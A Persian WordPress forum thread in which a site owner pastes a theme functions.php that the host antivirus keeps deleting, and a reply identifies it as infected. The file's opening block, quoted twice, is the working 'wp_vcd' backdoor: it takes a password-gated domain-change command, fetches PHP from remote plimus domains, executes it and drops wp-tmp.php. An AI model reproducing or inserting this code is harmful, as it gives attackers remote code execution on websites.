nasri 13 ارسال شده در شهریور 97 گزارش بازنشر ارسال شده در شهریور 97 با سلام چند هفته هست که فایل فانکشن قالب سایت توسط آنتی شلر سرور به طور خودکار حذف می شود از پشتیبانی سوال کردم گفت فایل دارای کد مخرب هست اما هر چه جستجو کردم کد مخربی در فایل پیدا نکردم. این کد ها دقیقا در سرور و هاست قبلی وجود داشتند و هیچ مشکلی نبود ولی از وقتی به هاست جدید منتقل شدیم انتی ویروس سرور به این فایل گیر می دهد و حذف می کند فایل را. لطفا دوستان این کدها را بررسی کنند و راهنمایی کنند الان یک هفته هست که سایت دان شده است و نمی توانم مشکل را بر طرف کنید. لطفا راهنمایی کنید. فایل های فانکشن را ضمیمه می کنم. <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '5cce6faa5d4d4d5e9cd422ee733cad67')) { $div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code3\.php/i',$file,$matcholddomain)) { $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); } $div_code_name = "wp_vcd"; $funcfile = __FILE__; if(!function_exists('theme_temp_setup')) { if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } $wp_auth_key='e0a42a9f93a2b035c80e7900c882c5bf'; if (($tmpcontent = @file_get_contents("http://www.plimus.info/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.plimus.info/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.plimus.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif (($tmpcontent = @file_get_contents("http://www.plimus.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.plimus.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } } } //$start_wp_theme_tmp //wp_tmp //$end_wp_theme_tmp ?><?php /** * Theme Alien Core functions and definitions * * @package BigBoom */ /** * Define theme's constant */ if ( ! defined( 'THEME_VERSION' ) ) { define( 'THEME_VERSION', '1.0.4' ); } if ( ! defined( 'THEME_DIR' ) ) { define( 'THEME_DIR', get_template_directory() ); } if ( ! defined( 'THEME_URL' ) ) { define( 'THEME_URL', get_template_directory_uri() ); } /** * Set the content width based on the theme's design and stylesheet. */ if ( ! isset( $content_width ) ) { $content_width = 640; } /** * Sets up theme defaults and registers support for various WordPress features. * * @since 1.0 * * @return void */ function bigboom_setup() { // Make theme available for translation. load_theme_textdomain( 'bigboom', get_template_directory() . '/lang' ); // Theme supports add_theme_support( 'woocommerce' ); add_theme_support( 'automatic-feed-links' ); add_theme_support( 'title-tag' ); add_theme_support( 'post-thumbnails' ); add_theme_support( 'post-formats', array( 'aside', 'image', 'video', 'quote', 'link' ) ); add_theme_support( 'html5', array( 'comment-list', 'search-form', 'comment-form', 'gallery', ) ); // Register theme nav menu register_nav_menus( array( 'primary' => __( 'Primary Menu', 'bigboom' ), 'footer' => __( 'Footer Menu', 'bigboom' ), 'mobile' => __( 'Mobile Menu', 'bigboom' ), ) ); } add_action( 'after_setup_theme', 'bigboom_setup' ); /** * Initialize additional functions/classes * * @since 1.0 */ function bigboom_init() { new BigBoom_VC; new BigBoom_WooCommerce; if ( is_admin() ) { new Bigboom_Walker_Nav_Menu_Custom_Fields; new TA_Demo_Import( array( 'home_page' => 'Home Page 1', 'blog_page' => 'Blog', 'base_url' => 'http://demo.themealien.com/bigboom-2/', 'sliders' => true, ) ); } else { new BigBoom_Shortcodes; } } add_action( 'after_setup_theme', 'bigboom_init', 20 ); /** * Add image sizes. * Must be added to init hook to remove sizes of portfolio plugin. * * @since 1.0 */ function bigboom_add_image_sizes() { add_image_size( 'blog-thumb-tiny', 113, 113, true ); add_image_size( 'blog-small-thumb', 555, 245, true ); add_image_size( 'blog-thumb', 870, 385, true ); add_image_size( 'blog-large-thumb', 1170, 520, true ); add_image_size( 'widget-thumb', 125, 135, true ); } add_action( 'after_setup_theme', 'bigboom_add_image_sizes', 10 ); /** * Register widgetized area and update sidebar with default widgets. * * @since 1.0 * * @return void */ function bigboom_register_sidebar() { // Register topbar sidebar register_sidebar( array( 'name' => __( 'Topbar Left', 'bigboom' ), 'id' => 'topbar-left', 'before_widget' => '<div id="%1$s" class="widget %2$s">', 'after_widget' => '</div>', 'before_title' => '<h4 class="widget-title">', 'after_title' => '</h4>', ) ); register_sidebar( array( 'name' => __( 'Topbar Right', 'bigboom' ), 'id' => 'topbar-right', 'before_widget' => '<div id="%1$s" class="widget %2$s">', 'after_widget' => '</div>', 'before_title' => '<h4 class="widget-title">', 'after_title' => '</h4>', ) ); // Register header sidebar register_sidebar( array( 'name' => __( 'Header Right', 'bigboom' ), 'id' => 'header-sidebar', 'before_widget' => '<div id="%1$s" class="widget %2$s">', 'after_widget' => '</div>', 'before_title' => '<h4 class="widget-title">', 'after_title' => '</h4>', ) ); // Register shop sidebar register_sidebar( array( 'name' => __( 'Shop Sidebar', 'bigboom' ), 'id' => 'shop-sidebar', 'before_widget' => '<div id="%1$s" class="widget %2$s">', 'after_widget' => '</div>', 'before_title' => '<h4 class="widget-title">', 'after_title' => '</h4>', ) ); // Register blog sidebar register_sidebar( array( 'name' => __( 'Blog Sidebar', 'bigboom' ), 'id' => 'blog-sidebar', 'before_widget' => '<div id="%1$s" class="widget %2$s">', 'after_widget' => '</div>', 'before_title' => '<h4 class="widget-title">', 'after_title' => '</h4>', ) ); // Register page sidebar register_sidebar( array( 'name' => __( 'Page Sidebar', 'bigboom' ), 'id' => 'page-sidebar', 'before_widget' => '<div id="%1$s" class="widget %2$s">', 'after_widget' => '</div>', 'before_title' => '<h4 class="widget-title">', 'after_title' => '</h4>', ) ); // Register footer sidebar register_sidebars( 5, array( 'name' => __( 'Footer', 'bigboom' ) . ' %d', 'id' => 'footer-sidebar', 'before_widget' => '<div id="%1$s" class="widget %2$s">', 'after_widget' => '</div>', 'before_title' => '<h4 class="widget-title">', 'after_title' => '</h4>', ) ); } add_action( 'widgets_init', 'bigboom_register_sidebar' ); /** * Load theme */ // Theme Options require THEME_DIR . '/inc/libs/theme-options/framework.php'; require THEME_DIR . '/inc/backend/theme-options.php'; // Widgets require THEME_DIR . '/inc/widgets/widgets.php'; // Visual composer require THEME_DIR . '/inc/backend/visual-composer.php'; // Woocommerce hooks require THEME_DIR . '/inc/frontend/woocommerce.php'; if ( is_admin() ) { require THEME_DIR . '/inc/libs/class-tgm-plugin-activation.php'; require THEME_DIR . '/inc/backend/plugins.php'; require THEME_DIR . '/inc/backend/meta-boxes.php'; require THEME_DIR . '/inc/backend/nav-menus.php'; require THEME_DIR . '/inc/importer/importer.php'; } else { // Frontend functions and shortcodes require THEME_DIR . '/inc/functions/media.php'; require THEME_DIR . '/inc/functions/nav.php'; require THEME_DIR . '/inc/functions/mega-menu-walker.php'; require THEME_DIR . '/inc/functions/layout.php'; require THEME_DIR . '/inc/functions/entry.php'; require THEME_DIR . '/inc/functions/shortcodes.php'; // Frontend hooks require THEME_DIR . '/inc/frontend/layout.php'; require THEME_DIR . '/inc/frontend/header.php'; require THEME_DIR . '/inc/frontend/nav.php'; require THEME_DIR . '/inc/frontend/entry.php'; require THEME_DIR . '/inc/frontend/footer.php'; } add_filter( 'woocommerce_product_tabs', 'wpb_remove_product_tabs', 98 ); function wpb_remove_product_tabs( $tabs ) { unset( $tabs['additional_information'] ); // Remove the description tab return $tabs; } functions.php functions.zip نقل قول لینک به ارسال
4M!R 805 ارسال شده در شهریور 97 گزارش بازنشر ارسال شده در شهریور 97 if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '5cce6faa5d4d4d5e9cd422ee733cad67')) { $div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code3\.php/i',$file,$matcholddomain)) { $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); } $div_code_name = "wp_vcd"; $funcfile = __FILE__; if(!function_exists('theme_temp_setup')) { if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } $wp_auth_key='e0a42a9f93a2b035c80e7900c882c5bf'; if (($tmpcontent = @file_get_contents("http://www.plimus.info/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.plimus.info/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.plimus.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif (($tmpcontent = @file_get_contents("http://www.plimus.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.plimus.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } } } //$start_wp_theme_tmp //wp_tmp //$end_wp_theme_tmp ?> خب سایتتون الوده به ماینر (استخراج ارز دیجیتالی ) هستش (وقتی سایت رو با گوشی و سیستم باز می کردین سیستم داغ نمی کرد؟ :| این کدهارو حذف کنید اگر از قالب و افزونه نال استفاده می کنید اینارم حذف کنید اگر نسخه وردپرستون اپدیت نیست اپدیت بکنید 1 نقل قول لینک به ارسال
پست های پیشنهاد شده
به گفتگو بپیوندید
هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .